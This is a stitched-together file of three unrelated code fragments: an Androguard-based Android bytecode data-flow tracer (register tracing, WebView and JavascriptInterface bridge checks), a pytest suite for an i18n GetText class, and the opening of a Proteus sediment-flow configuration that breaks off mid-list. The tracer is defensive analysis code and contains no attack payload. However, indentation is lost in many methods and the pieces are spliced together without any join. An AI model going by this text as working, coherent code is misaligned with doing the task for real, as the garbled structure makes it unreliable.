                        [0x6E, 0x6F, 0x70, 0x71, 0x72,
                         0x74, 0x75, 0x76, 0x77, 0x78]):
                    # Last operand names the invoked method (smali string).
                    final_operand = operands[-1][2]
                    if self.trace_to_type == 'ARGTO':
                        if final_operand in self.trace_to_list:
                            # If an argument index is specified, it must
                            # match the position of the traced register.
                            if self.trace_to_argindex != None:
                                if op_index == self.trace_to_argindex:
                                    self.output_chains.append(new_chain)
                                    return
                            else:
                                self.output_chains.append(new_chain)
                                return
                    # If the method is loadurl, then process further.
                    if ((final_operand.split('->')[1]).split('(')[0]
                            == 'loadUrl'):
                        is_webview_instance = \
                            self.fn_check_webview_instance(
                                final_operand.split('->')[0]
                            )
                        if is_webview_instance == True:
                            # loadUrl on a WebView: continue the trace
                            # inside any registered JS-interface methods.
                            jsinterface_classes = \
                                self.fn_check_jsbridge(
                                    final_operand.split('->')[0]
                                )
                            if jsinterface_classes != None:
                                jsinterface_methods = \
                                    self.fn_get_all_jsinterface_methods(
                                        jsinterface_classes
                                    )
                                for jsinterface_method in jsinterface_methods:
                                    self.fn_trace_p_forward(
                                        jsinterface_method,
                                        None,
                                        new_chain
                                    )
                    # Trace output: if the next instruction is move-result,
                    # the call's return value flows into a new register.
                    if i != (num_instructions-1):
                        next_instr = instructions[i+1]
                        next_opcode = next_instr.get_op_value()
                        if next_opcode in [0x0A, 0x0B, 0x0C]:
                            move_result_operand = \
                                (next_instr.get_operands())[0][1]
                            self.fn_trace_v_forward(
                                method,
                                i+2,
                                move_result_operand,
                                chain
                            )
                    # If invoke-direct, then trace object.
                    if ((opcode in [0x70, 0x76]) and (op_index != 0)):
                        self.fn_trace_v_forward(
                            method,
                            i+1,
                            operands[0][1],
                            chain
                        )
                    # Trace within invoked method.
                    self.fn_trace_p_forward(
                        final_operand,
                        op_index,
                        new_chain
                    )
def fn_check_webview_instance(self, class_name):
"""Checks if a class is a (subclass of) webview.
:param class_name: string name of class
:returns: boolean indicating whether the class is a subclass of webview
"""
if class_name == 'Landroid/webkit/WebView;':
return True
superclasses = \
self.inst_analysis_utils.fn_find_superclasses(class_name)
for superclass in superclasses:
if superclass == 'Landroid/webkit/WebView;':
return True
return False
def fn_check_jsbridge(self, class_name):
"""Finds javascriptinterface methods for a given class.
:param class_name: string name of class
:returns: list of JavascriptInterface methods
"""
string = class_name + '->addJavascriptInterface'
if string in self.checked_methods:
return
self.checked_methods.add(string)
all_methods = self.inst_analysis_utils.fn_get_calls_to_method(
class_name,
'addJavascriptInterface',
'.'
)
output = []
for method in all_methods:
output.extend(self.fn_check_method_for_jsinterface_calls(method))
return list(set(output))
def fn_check_method_for_jsinterface_calls(self, method):
"""Checks method for presence of calls to JavascriptInterface class.
:param method: Androguard EncodedMethod
:returns: list of JavascriptInterface classes called by method
"""
output = []
for jsinterface_class in self.jsinterface_classes:
# A very unscientific way of doing this.
for instruction in list(method.get_instructions()):
if (instruction.get_op_value() not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
last_operand = instruction.get_operands()[-1][2]
if jsinterface_class in last_operand:
output.append(jsinterface_class)
break
return list(set(output))
def fn_get_all_jsinterface_methods(self, jsinterface_classes):
"""Checks for all JavascriptInterface methods for JSinterface classes.
:param jsinterface_classes: list of JavascriptInterface classes
:returns: list of JavascriptInterface methods
"""
output = set()
for jsinterface_class in jsinterface_classes:
for jsinterface_method in self.jsinterface_methods:
if jsinterface_class in jsinterface_method:
output.add(jsinterface_method)
return list(output)
def fn_trace_p_forward(self, method_string, p_index, chain):
"""Traces registers used as operands to a method.
:param method_string: string representation of method (smali)
:param p_index: integer for specific operand index or None
for all operands
:param chain: string containing comma-separated "chain links"
"""
[class_part, method_part, desc_part] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_string(
method_string
)
new_chain = chain + ',' + method_string
all_methods = self.inst_analysis_utils.fn_get_methods(
class_part,
method_part,
desc_part
)
for methodanalysis in all_methods:
# Ignore external methods.
if methodanalysis.is_external() == True:
continue
method = methodanalysis.get_method()
# Ignore abstract methods. TODO: Get calls to.
if method.get_code() == None:
continue
num_locals = self.fn_get_locals(method)
total_registers = method.code.get_registers_size()
if p_index != None:
p_register = num_locals + p_index
self.fn_trace_v_forward(method, 0, p_register, new_chain)
else:
for i in range(total_registers-num_locals):
p_register = num_locals + i
self.fn_trace_v_forward(method, 0, p_register, new_chain)
def fn_trace_field_forward(self, field, chain):
"""Identifies "get" for field and traces the appropriate register.
:param field: string representing field
:param chain: string containing comma-separated "chain links"
"""
field_components = field.split(' ')
field = field_components[0] + ':' + field_components[1]
field = field.replace('[','\[')
all_fields = self.androguard_dx.find_fields(field)
all_field_xref_to = []
for field in all_fields:
xref_to = field.get_xref_read()
if xref_to[1] not in all_field_xref_to:
all_field_xref_to.append(xref_to[1])
for field_xref_to_method in all_field_xref_to:
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
field_xref_to_method
)
field_xref_to_method_string = c + '->' + m + d
new_chain = chain + ',' + field_xref_to_method_string
num_locals = self.fn_get_locals(field_xref_to_method)
instructions = list(field_xref_to_method.get_instructions())
for index, instruction in enumerate(instructions):
if (instruction.get_op_value() in
[0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66]):
operands = instruction.get_operands()
last_operand = operands[-1][2]
if last_operand != field:
continue
field_source = operands[0][1]
self.fn_trace_forward(
field_xref_to_method_string,
new_chain
)
    def fn_trace_reverse(self, trace_from, chain, position=0,
                         class_or_method=None):
        """Performs reverse tracing.

        Walks backwards from a method (or class) of interest to its
        callers, recursing until a stop condition is satisfied or no
        further callers exist. Satisfied chains are appended to
        self.output_chains.

        :param trace_from: string indicating starting point for trace
        :param chain: string containing comma-separated "chain links"
        :param position: integer operand index
        :param class_or_method: either "<class>" or "<method>"
        """
        # Get class/method/desc parts.
        [class_part, method_part, desc_part] = \
            self.fn_determine_class_method_desc(
                trace_from,
                class_or_method
            )
        # Include subclasses.
        all_classes = \
            self.inst_analysis_utils.fn_find_subclasses(class_part)
        all_classes.append(class_part)
        for one_class in all_classes:
            # Rebuild a smali method string; '.' parts mean "don't care"
            # and are omitted.
            combined_method_string = one_class
            if '.' not in method_part:
                combined_method_string = \
                    combined_method_string + '->' + method_part
            if '.' not in desc_part:
                combined_method_string = \
                    combined_method_string + desc_part
            # 'e' + endpoint + position keys the memo of already-examined
            # (endpoint, operand-position) pairs.
            method_check_string = 'e' + combined_method_string + ' ' + str(position)
            if method_check_string in self.checked_methods:
                continue
            self.checked_methods.add(method_check_string)
            # If the trace to type doesn't care about arguments or results
            # (i.e., just a class or method),
            # then perform a stop condition check.
            if ((self.trace_to_type != 'RESULTOF') and
                    (self.trace_to_type != 'ARGTO')):
                self.fn_check_generic_stop_condition(combined_method_string)
                if self.stop_condition == STOP_CONDITION_TRUE:
                    self.output_chains.append(chain)
                    # NOTE(review): resets to the literal False rather than
                    # STOP_CONDITION_FALSE (used elsewhere) -- confirm the
                    # two are interchangeable.
                    self.stop_condition = False
                    continue
            # Check to see if the method is a JavaScript interface.
            # If it is, then the commands themselves may not be found within
            # the code. However, any webview that uses this must call the
            # <init> method of this class.
            if combined_method_string in self.all_annotations:
                if ('Landroid/webkit/JavascriptInterface;' in
                        self.all_annotations[combined_method_string]):
                    method_part = '<init>'
                    desc_part = '.'
            # Get starting points.
            starting_points = \
                self.inst_analysis_utils.fn_get_calls_to_method(
                    one_class,
                    method_part,
                    desc_part
                )
            for starting_point in starting_points:
                [c, m, d] = \
                    self.inst_analysis_utils.fn_get_class_method_desc_from_method(
                        starting_point
                    )
                starting_point_string = c + '->' + m + d
                # 'r' + caller + callee keys the memo of already-traced
                # caller/callee pairs.
                method_check_string = 'r' \
                    + starting_point_string \
                    + ' ' \
                    + combined_method_string
                if method_check_string in self.checked_methods:
                    continue
                self.checked_methods.add(method_check_string)
                num_locals = self.fn_get_locals(starting_point)
                # Callers that are themselves JavascriptInterface methods
                # are invoked from JS, not bytecode: jump to the class
                # <init> and trace its first parameter instead.
                if starting_point_string in self.all_annotations:
                    if ('Landroid/webkit/JavascriptInterface;' in
                            self.all_annotations[starting_point_string]):
                        chain = chain + ',' + starting_point_string
                        starting_point_string = starting_point.get_class_name() \
                            + '-><init>'
                        self.fn_trace_reverse(
                            starting_point_string,
                            chain + ',' + starting_point_string,
                            1
                        )
                        continue
                # Find (instruction index, register) pairs where the
                # caller passes an operand at `position` to the callee.
                index_reg = self.fn_identify_instr_reg(
                    starting_point,
                    combined_method_string,
                    position
                )
                if index_reg == []:
                    continue
                for tuple in index_reg:
                    # Local registers: trace backwards within the caller.
                    if tuple[1] < num_locals:
                        v_reg_trace_output = self.fn_trace_v_reverse(
                            starting_point,
                            tuple[0]-1,
                            tuple[1],
                            chain
                        )
                        if v_reg_trace_output == True:
                            self.output_chains.append(chain)
                            self.stop_condition = STOP_CONDITION_FALSE
                            continue
                        else:
                            continue
                    # Parameter registers: recurse into the caller's own
                    # callers at the corresponding argument position.
                    else:
                        self.fn_trace_reverse(
                            starting_point_string,
                            chain + ',' + starting_point_string,
                            tuple[1] - num_locals
                        )
    def fn_trace_v_reverse(self, method, index, register, chain):
        """Traces a register backward from a starting point within a method.

        Walks instructions from `index` down towards the start of the
        method, following the register through moves, array and field
        accesses, and invoke results.

        :param method: Androguard EncodedMethod to trace through
        :param index: instruction index (integer) to start trace from
        :param register: integer value of register
        :param chain: string containing comma-separated "chain links"
        :returns: True when a RESULTOF/ARGTO stop condition is satisfied,
            otherwise None
        """
        instructions = list(method.get_instructions())
        # NOTE(review): num_instructions is computed but unused here.
        num_instructions = len(instructions)
        num_locals = self.fn_get_locals(method)
        [c, m, d] = \
            self.inst_analysis_utils.fn_get_class_method_desc_from_method(
                method
            )
        method_string = c + '->' + m + d
        new_chain = chain + ',' + method_string
        # Walk backwards. NOTE(review): range(index, 0, -1) stops at
        # instruction 1, so instruction 0 is never examined -- confirm
        # whether that is intentional.
        for i in range(index, 0, -1):
            instruction = instructions[i]
            opcode = instruction.get_op_value()
            operands = instruction.get_operands()
            for op_index, operand in enumerate(operands):
                # 0x00 is "register".
                if operand[0] != 0:
                    continue
                if (register != operand[1]):
                    continue
                # move: follow the source register (local -> intra-method
                # trace; parameter -> inter-procedural reverse trace).
                if ((opcode in
                    [0x01, 0x02, 0x03, 0x04, 0x05,
                     0x06, 0x07, 0x08, 0x09]) and
                    (op_index == 0)):
                    move_source = operands[1][1]
                    if move_source < num_locals:
                        self.fn_trace_v_reverse(
                            method,
                            i-1,
                            move_source,
                            chain
                        )
                    else:
                        self.fn_trace_reverse(
                            method_string,
                            new_chain,
                            move_source - num_locals
                        )
                    return
                # move-result.
                elif (opcode in [0x0A, 0x0B, 0x0C]):
                    previous_instruction = instructions[i-1]
                    # If move-result did not follow an invoke opcode,
                    # then continue.
                    if (previous_instruction.get_op_value() not in
                            [0x6E, 0x6F, 0x70, 0x71, 0x72,
                             0x74, 0x75, 0x76, 0x77, 0x78]):
                        continue
                    # See if previous instruction satisfies trace to condition.
                    if self.trace_to_type == 'RESULTOF':
                        self.fn_check_traceto_result(previous_instruction)
                        if self.stop_condition == STOP_CONDITION_TRUE:
                            return True
                    # Trace each register as well.
                    previous_operands = previous_instruction.get_operands()
                    for previous_operand in previous_operands:
                        if previous_operand[0] != 0:
                            continue
                        if previous_operand[1] < num_locals:
                            self.fn_trace_v_reverse(
                                method,
                                i-2,
                                previous_operand[1],
                                chain
                            )
                        else:
                            self.fn_trace_reverse(
                                method_string,
                                new_chain,
                                previous_operand[1] - num_locals
                            )
                    return
                # Constant declaration. This indicates a value change.
                # We aren't interested.
                elif (opcode in
                        [0x12, 0x13, 0x14, 0x15, 0x16,
                         0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C]):
                    return
                # aget. We trace the source, and stop tracing the
                # current register (because it would have had a different
                # value prior to aget).
                elif ((opcode in
                        [0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A]) and
                        (op_index==0)):
                    aget_source = operands[1][1]
                    if aget_source < num_locals:
                        self.fn_trace_v_reverse(
                            method,
                            i-1,
                            aget_source,
                            chain
                        )
                    else:
                        self.fn_trace_reverse(
                            method_string,
                            new_chain,
                            aget_source - num_locals
                        )
                    return
                # aput: the traced register is the array object
                # (op_index 1); trace the register whose value was
                # written into it.
                elif((opcode in
                        [0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51]) and
                        (op_index == 1)):
                    aput_source = operands[0][1]
                    if aput_source < num_locals:
                        self.fn_trace_v_reverse(
                            method,
                            i-1,
                            aput_source,
                            chain
                        )
                    else:
                        self.fn_trace_reverse(
                            method_string,
                            new_chain,
                            aput_source - num_locals
                        )
                    return
                # iget. We trace the source field, and stop tracing the
                # current register (because it would have had a different
                # value prior to iget).
                elif ((opcode in
                        [0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58]) and
                        (op_index==0)):
                    iget_source = operands[2][2]
                    self.fn_trace_field_reverse(iget_source, new_chain)
                    return
                # sget.
                elif ((opcode in
                        [0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66]) and
                        (op_index==0)):
                    sget_source = operands[1][2]
                    self.fn_trace_field_reverse(sget_source, new_chain)
                    return
                # invoke-<> method calls.
                # This should actually never come up, because ARGTO wouldn't be
                # TRACETO in reverse tracing.
                elif (opcode in
                        [0x6E, 0x6F, 0x70, 0x71, 0x72,
                         0x74, 0x75, 0x76, 0x77, 0x78]):
                    if self.trace_to_type == 'ARGTO':
                        self.fn_check_traceto_arg(instruction, op_index)
                        if self.stop_condition == STOP_CONDITION_TRUE:
                            return True
                    # If this is a class instantiation, then trace other args.
                    if op_index == 0:
                        if len(operands)<= 2:
                            continue
                        for x in range(1, len(operands)-1):
                            if operands[x][0] != 0:
                                continue
                            arg_operand = operands[x][1]
                            if arg_operand < num_locals:
                                self.fn_trace_v_reverse(
                                    method,
                                    i-1,
                                    arg_operand,
                                    chain
                                )
                            else:
                                self.fn_trace_reverse(
                                    method_string,
                                    new_chain,
                                    arg_operand - num_locals
                                )
                    # Don't return here!
def fn_trace_field_reverse(self, field, chain):
"""Identifies "put" for field and traces the appropriate register.
:param field: string representing field
:param chain: string containing comma-separated "chain links"
"""
field_components = field.split(' ')
field = field_components[0] + ':' + field_components[1]
field = field.replace('[','\[')
all_fields = self.androguard_dx.find_fields(field)
all_field_xref_from = []
for field in all_fields:
xref_from = field.get_xref_write()
if xref_from[1] not in all_field_xref_from:
all_field_xref_from.append(xref_from[1])
for field_xref_from_method in all_field_xref_from:
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
field_xref_from_method
)
field_xref_from_method_string = c + '->' + m + d
new_chain = chain + ',' + field_xref_from_method_string
num_locals = self.fn_get_locals(field_xref_from_method)
instructions = list(field_xref_from_method.get_instructions())
for index, instruction in enumerate(instructions):
if (instruction.get_op_value() in
[0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F,
0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D]):
operands = instruction.get_operands()
last_operand = operands[-1][2]
if last_operand != field:
continue
field_source = operands[0][1]
if field_source < num_locals:
self.fn_trace_v_reverse(
field_xref_from_method,
index-1,
field_source,
chain
)
else:
self.fn_trace_reverse(
field_xref_from_method_string,
new_chain,
field_source - num_locals
)
def fn_check_traceto_arg(self, instruction, op_index):
"""Checks if instruction+operand satisfy an ARGTO condition in TRACETO.
Sets a variable to indicate that the condition has been satisfied.
:param instruction: androguard.core.bytecodes.dvm.Instruction
:param op_index: integer operand index
"""
if op_index != self.trace_to_argindex:
return
operands = instruction.get_operands()
last_operand = operands[-1][2]
for item in self.trace_to_list:
if item in last_operand:
self.stop_condition = STOP_CONDITION_TRUE
return
def fn_check_traceto_result(self, invoked_method_instruction):
"""Checks if an instruction satisfies a RESULTOF condition in TRACETO.
Sets a variable to indicate that the condition has been satisfied.
:param invoked_method_instruction: Androguard EncodedMethod
"""
operands = invoked_method_instruction.get_operands()
last_operand = operands[-1][2]
for item in self.trace_to_list:
if item in last_operand:
self.stop_condition = STOP_CONDITION_TRUE
return
def fn_check_generic_stop_condition(self, check_value):
"""Checks if an instruction satisfies a generic TRACETO condition.
Sets a variable to indicate that the condition has been satisfied.
:param check_value: string to check against trace_to classes/methods
"""
if self.to_class_method == '<class>':
check_value = check_value.split('->')[0]
if check_value in self.trace_to_list:
self.stop_condition = STOP_CONDITION_TRUE
return
# Special types of checks for when the traceto is hardcoded.
if self.hardcoded_traceto == False:
return
# This should never be true. Hardcoded traceto's will only have one
# value in the list (even with ORs).
if len(self.trace_to_list) > 1:
return
trace_to_item = self.trace_to_list[0]
# Check for wildcard classes.
if ((self.to_class_method == '<class>') and ('*' in trace_to_item)):
trace_to_item = trace_to_item.replace('*', '')
if trace_to_item in check_value:
self.stop_condition = STOP_CONDITION_TRUE
else:
self.stop_condition = STOP_CONDITION_FALSE
return
# Do a partial search for methods only. Do this only when the entire
# trace-to is hardcoded.
# If traceto is only a class, we can't do much.
if '->' not in trace_to_item:
return
if '->' not in check_value:
return
# If traceto doesn't have descriptor, don't proceed.
# Else, we might end up with way too many FPs.
if '(' not in trace_to_item:
return
if '(' not in check_value:
return
if trace_to_item.split('->')[1] == check_value.split('->')[1]:
self.stop_condition = STOP_CONDITION_MAYBE
return
def fn_identify_instr_reg(self, calling_method, called_method,
reg_position):
"""Identifies the index and register used for a method call.
:param calling_method: Androguard EncodedMethod containing call
to method of interest
:param called_method: string representing method of interest (smali)
:param reg_position: integer operand index
:returns: list of (instruction index, register) tuples
"""
index_reg = []
instructions = list(calling_method.get_instructions())
for index, instruction in enumerate(instructions):
opcode = instruction.get_op_value()
if (opcode not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
all_operands = instruction.get_operands()
method_operand = all_operands[-1][2]
if called_method in method_operand:
if reg_position >= (len(all_operands)-1):
reg_position = len(all_operands)-2
operand_of_interest = all_operands[int(reg_position)][1]
index_reg.append((index, operand_of_interest))
return index_reg
def fn_identify_result_reg(self, calling_method, called_method):
"""Identifies the index and register of the output of a method call.
:param calling_method: Androguard EncodedMethod containing call
to method of interest
:param called_method: string representing method of interest (smali)
:returns: list of (instruction index, register) tuples
"""
index_reg = []
try:
instructions = list(calling_method.get_instructions())
except:
return []
for index, instruction in enumerate(instructions):
opcode = instruction.get_op_value()
if (opcode not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
all_operands = instruction.get_operands()
method_operand = all_operands[-1][2]
if called_method in method_operand:
if index == (len(instructions)-1):
break
next_instr = instructions[index+1]
if next_instr.get_op_value() not in [0x0A, 0x0B, 0x0C]:
continue
result_register = (next_instr.get_operands())[0][1]
index_reg.append((index+1, result_register))
return index_reg
def fn_determine_class_method_desc(self, trace_from, trace_from_type=None):
"""Determines the class/method/desc parts based on trace start point.
:param trace_from: string denoting trace start point
:param trace_from_type: string containing trace start point type
(either "<class>" or "<method>")
:returns: list containing class, method, descriptor parts
"""
[class_part, method_part, desc_part] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_string(
trace_from
)
# If we care only about the class part, overwrite the method/desc
# parts with '.' (i.e., "don't care")
if trace_from_type == '<class>':
method_part = '.'
desc_part = '.'
return [class_part, method_part, desc_part]
def fn_get_trace_type(self, string):
"""Gets trace starting point type.
:param string: string containing trace start point type (either
"<class>" or "<method>". The string may not directly contain
these values, in which case the type will have to be inferred.
:returns: list containing the start point type and the modified string
(within the "<class>" or "<method>" indication removed)
"""
trace_type = '<class>'
if ':' in string:
trace_type = string.split(':')[0]
string = string[len(trace_type)+1:]
else:
if '->' in string:
trace_type = '<method>'
return [trace_type, string]
    def fn_get_trace_items(self, string, trace_type):
        """Gets the actual strings to use as start/end points of trace.

        Side effect: sets self.hardcoded_traceto -- False when the string
        is a "@link" reference (resolved against self.current_links),
        True when it is a literal value.

        :param string: the string specified within the template
        :param trace_type: string (either "<class>" or "<method>"), indicating
            whether the trace should begin/end at the class level or method
            level
        :returns: list of possible start/end points
        """
        output_items = []
        # If the string begins with @, then we need to find linked items.
        if string[0] == '@':
            self.hardcoded_traceto = False
            # If a sub-part has not been specified, then assume that the
            # entire string is the link name.
            if ']' not in string:
                link_name = string
                link_subpart = ''
                remaining_string = ''
            # If a sub-part has been specified, then split the string to
            # identify the link name, relevant sub-part, and remainder
            # of string.
            else:
                split_for_link = string.split(']')
                remaining_string = split_for_link[1]
                second_split = split_for_link[0].split('[')
                link_name = second_split[0]
                link_subpart = second_split[1].replace(' ', '')
            # Get all linked items.
            linked_items = self.inst_analysis_utils.fn_get_linked_items(
                self.current_links,
                link_name
            )
            # No sub-part: use each linked item as-is.
            if link_subpart == '':
                for linked_item in linked_items:
                    return_string = linked_item + remaining_string
                    if trace_type == '<class>':
                        return_string = return_string.split('->')[0]
                    output_items.append(return_string)
            # "<class>" sub-part: keep only the class portion of the link.
            elif link_subpart == '<class>':
                for linked_item in linked_items:
                    class_part_only = linked_item.split('->')[0]
                    return_string = class_part_only + remaining_string
                    if trace_type == '<class>':
                        return_string = return_string.split('->')[0]
                    output_items.append(return_string)
            # "<method>" sub-part: only links that actually are methods.
            elif link_subpart == '<method>':
                for linked_item in linked_items:
                    if '->' not in linked_item:
                        continue
                    return_string = linked_item + remaining_string
                    if trace_type == '<class>':
                        return_string = return_string.split('->')[0]
                    output_items.append(return_string)
        # If the string doesn't begin with @, then it's a normal string.
        else:
            self.hardcoded_traceto = True
            if trace_type == '<class>':
                string = string.split('->')[0]
            output_items = [string]
        return output_items
def fn_enumerate_trace_source_sinks(self, trace_template):
"""Enumerates the (list of) trace start and end points from template.
:param trace_template: dictionary object corresponding to a single
trace, from which trace end points are to be extracted
:returns: list containing two lists - the first a list of possible
start points and the second, a list of possible end points
"""
# Get the start points.
trace_from_string = trace_template['TRACEFROM']
from_arg_index = 0
trace_from_type = None
if 'RESULTOF' in trace_from_string:
trace_from_type = 'RESULTOF'
trace_from = trace_from_string.split('RESULTOF')[1]
trace_from = trace_from.strip()
elif 'ARGTO' in trace_from_string:
trace_from_type = 'ARGTO'
trace_from = \
(trace_from_string.split('ARGTO')[1]).split('ARGINDEX')[0]
trace_from = trace_from.strip()
if 'ARGINDEX' in trace_from_string:
from_arg_index = \
int((trace_from_string.split('ARGINDEX')[1]).strip())
else:
trace_from = trace_from_string
if ' OR ' in trace_from:
trace_from_string_list = trace_from.split(' OR ')
else:
trace_from_string_list = [trace_from]
# Get the trace ending points.
trace_to_string = trace_template['TRACETO']
to_arg_index = None
trace_to_type = None
if 'RESULTOF' in trace_to_string:
trace_to_type = 'RESULTOF'
trace_to = trace_to_string.split('RESULTOF')[1]
trace_to = trace_to.strip()
elif 'ARGTO' in trace_to_string:
trace_to_type = 'ARGTO'
trace_to = \
(trace_to_string.split('ARGTO')[1]).split('ARGINDEX')[0]
trace_to = trace_to.strip()
if 'ARGINDEX' in trace_to_string:
to_arg_index = \
int((trace_to_string.split('ARGINDEX')[1]).strip())
trace_to = trace_to_string
if ' OR ' in trace_to:
trace_to_string_list = trace_to.split(' OR ')
else:
trace_to_string_list = [trace_to]
# Set variables.
self.trace_from_main_list = trace_from_string_list
self.trace_from_type = trace_from_type
self.trace_from_argindex = from_arg_index
self.trace_to_main_list = trace_to_string_list
self.trace_to_type = trace_to_type
self.trace_to_argindex = to_arg_index
def fn_analyse_returns(self, trace_template):
"""Analyses the return object and appends items to returns list.
:param trace_template: dictionary object containing RETURN element
"""
returnables = trace_template['RETURN']
returnable_elements_name = returnables.split(' AS ')[1]
return_type = returnables.split(' AS ')[0]
# Analyse each chain.
for chain_string in self.output_chains:
chain = chain_string.split(',')
if self.trace_direction == TRACE_REVERSE:
chain.reverse()
output_str = ''
for chain_node in chain:
chain_node = chain_node.strip()
if output_str == '':
output_str = chain_node
else:
output_str = output_str + ',' + chain_node
self.current_returns.append({returnable_elements_name: output_str})
def fn_get_jsinterface_classes_methods(self):
"""Gets all classes and methods with JavascriptInterface annotations."""
jsinterface_methods = set()
jsinterface_classes = set()
for method in self.all_annotations:
if ('Landroid/webkit/JavascriptInterface;' in
self.all_annotations[method]):
jsinterface_methods.add(method)
class_part = method.split('->')[0]
jsinterface_classes.add(class_part)
self.jsinterface_methods = jsinterface_methods
self.jsinterface_classes = jsinterface_classes
def fn_get_locals(self, method):
num_registers = method.code.get_registers_size()
num_parameter_registers = method.code.get_ins_size()
num_local_registers = num_registers - num_parameter_registers
return num_local_registers |
<gh_stars>10-100
# coding: utf-8
"""
Test i18n class
"""
from __future__ import unicode_literals, absolute_import
from mock import MagicMock, patch, mock_open
import pytest
import sugar.lib.i18n
from sugar.utils.jid import jidstore
# pylint: disable=W0621,R0201,R0201,W0612
@pytest.fixture
def gettext_class():
    """
    Un-singleton the class init, so it can be reused in the tests.

    Clears the cached singleton back-reference on GetText so each test
    constructs a fresh instance.

    :return: the GetText class itself (not an instance; tests call it)
    """
    sugar.lib.i18n.GetText.__ref__ = None
    return sugar.lib.i18n.GetText
class TestGetText(object):
    """
    Test case for the GetText i18n helper (plural-aware message lookup
    with auto-add of missing messages).
    """
    @patch("sugar.lib.i18n.get_logger", MagicMock())
    @patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere"))
    @patch("os.path.exists", MagicMock(return_value=True))
    def test_internal_format(self, gettext_class):
        """
        Test internal format and the structure within the YAML i18n messages.

        :param gettext_class: gettext_class fixture
        :return: None
        """
        # Plural-form table: one message key with its
        # none/one/few/many variants.
        translation_data = """
apple:
  none: no apples
  one: one apple
  few: few apples
  many: lots of apples
""".strip()
        with patch("sugar.utils.files.fopen", mock_open(read_data=translation_data), create=True):
            gtx = gettext_class()
            # count selects the plural form: 0 -> none, 1 -> one,
            # 2-3 -> few, >=4 -> many.
            assert gtx.gettext("apple") == "no apples"
            assert gtx.gettext("apple", 1) == "one apple"
            assert gtx.gettext("apple", 2) == "few apples"
            assert gtx.gettext("apple", 4) == "lots of apples"
    @patch("sugar.lib.i18n.get_logger", MagicMock())
    @patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere"))
    @patch("os.path.exists", MagicMock(return_value=True))
    @patch("os.access", MagicMock(return_value=True))
    def test_autoadd_data(self, gettext_class):
        """
        Test auto-add message to the translation.

        :param gettext_class: gettext_class fixture
        :return: None
        """
        # NOTE(review): "<NAME>" looks like an anonymised placeholder from
        # the dataset export; any unique message string works here.
        msg = "<NAME>"
        yaml_mock = MagicMock()
        with patch("sugar.utils.files.fopen", mock_open(read_data=""),
                   create=True) as fhm, patch("sugar.lib.i18n.yaml.dump", yaml_mock) as yml:
            gtx = gettext_class()
            for count in [0, 1, 3, 4]:
                gtx.gettext(msg, count=count)
            # The unknown message must have been persisted via yaml.dump,
            # with every plural form defaulting to the message itself.
            assert yaml_mock.called
            translation_entry = yaml_mock.call_args_list[0][0][0]
            assert msg in translation_entry
            plurals = translation_entry[msg]
            assert plurals["none"] == plurals["one"] == plurals["few"] == plurals["many"] == msg
    @patch("sugar.lib.i18n.get_logger", MagicMock())
    @patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere/{}".format(jidstore.create())))
    @patch("os.access", MagicMock(return_value=True))
    def test_load_skip_no_access(self, gettext_class):
        """
        Test data is not loaded if no read access to it.

        :param gettext_class: gettext_class fixture
        :return: None
        """
        # Path does not exist (no os.path.exists patch), so no data loads.
        assert gettext_class().path is None
    @patch("os.path.join", MagicMock(return_value="/in/the/middle/of/nowhere/{}".format(jidstore.create())))
    @patch("os.path.exists", MagicMock(return_value=True))
    @patch("os.access", MagicMock(return_value=False))
    def test_save_skip_no_access(self, gettext_class):
        """
        Test if auto-add won't add if write-access is denied.

        :param gettext_class: gettext_class fixture
        :return: None
        """
        logger_mock = MagicMock()
        with patch("sugar.utils.files.fopen",
                   mock_open(read_data="")) as fhdr, patch("sugar.lib.i18n.get_logger",
                                                           logger_mock) as lgr:
            gtx = gettext_class()
            gtx.gettext(jidstore.create())
            # Write access is denied, so an error must have been logged.
            msg = logger_mock.call_args_list[0][0][0].log.error.call_args_list[0][0][0]
            assert "Unable to update i18n messages at" in msg
|
<reponame>AntoninoScala/air-water-vv
from proteus import StepControl
from math import *
import proteus.MeshTools
from proteus import Domain, Context
from proteus.default_n import *
from proteus.Profiling import logEvent
from proteus.mprans import SpatialTools as st
from proteus import Gauges as ga
from proteus import WaveTools as wt
from proteus.mprans.SedClosure import HsuSedStress
# Case parameters (physical and numerical), overridable from the
# command line via proteus's Context mechanism.
opts=Context.Options([
    # predefined test cases
    ("waterLine_x", 10.00, "Width of free surface from left to right"),
    ("waterLine_z", 0.3, "Heigth of free surface above bottom"),
    ("Lx", 2.00, "Length of the numerical domain"),
    ("Ly", 0.5, "Heigth of the numerical domain"),
    # fluid paramters
    ("rho_0", 998.2, "water density"),
    ("rho_1", 998.2, "air density"),
    ("nu_0", 1.004e-6, "water kin viscosity"),
    ("nu_1", 1.004e-6, "air kin viscosity"),
    ('g',np.array([0.0, -9.8, 0.0]),'Gravitational acceleration'),
    # sediment parameters
    ('cSed', 0.05,'Sediment concentration'),
    ('rho_s',2600 ,'sediment material density'),
    ('alphaSed', 150.,'laminar drag coefficient'),
    ('betaSed', 0.0,'turbulent drag coefficient'),
    ('grain',0.0025, 'Grain size'),
    ('packFraction',0.2,'threshold for loose / packed sediment'),
    ('packMargin',0.01,'transition margin for loose / packed sediment'),
    ('maxFraction',0.635,'fraction at max sediment packing'),
    ('frFraction',0.57,'fraction where contact stresses kick in'),
